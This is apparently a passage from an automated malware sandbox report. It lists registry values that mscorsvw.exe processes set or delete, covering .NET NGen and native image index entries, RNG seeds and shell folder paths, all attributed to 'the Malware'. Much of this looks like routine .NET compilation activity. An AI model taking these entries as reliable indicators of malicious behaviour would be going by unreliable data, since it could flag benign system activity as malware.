[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index59]

The process mscorsvw.exe:3680 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 CD A9 25 B6 E9 CA 81 80 E3 1A D9 9A 23 9B D3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3532 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DF 70 94 3E 16 AE F0 B9 19 2F 51 C0 75 4D E1 97"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

The process mscorsvw.exe:2924 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 7A 88 1B 31 CD 98 F5 37 9B 53 4F C4 46 8E 89"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2700 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 60 EE A6 A2 00 34 7A 18 40 19 87 49 D0 4C AE"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "00 34 67 7B 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]

The process mscorsvw.exe:2160 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 1B 08 5B A3 96 8E BB FC BB D6 B9 75 6C F2 A9"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2756 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD B8 5E 74 CF C0 1F B2 96 50 BB 15 11 4D EF 95"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3136 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "6E 62 79 7C 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "60 0E 41 7B 03 86 D1 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 A5 FD FF 22 47 FF 09 EE 75 5F 5C F1 38 58 6A"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]

The process mscorsvw.exe:3336 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C E8 B4 78 35 85 A0 31 5E 49 93 F2 2B EF 78 A4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3408 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 02 61 B7 AD 95 36 88 51 E1 22 81 5F CC 02 5C"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:280 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 60 85 67 21 00 61 CB CC 9C E4 79 02 35 8B CD"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The process mscorsvw.exe:3816 makes changes in the system registry.
The Malware creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"

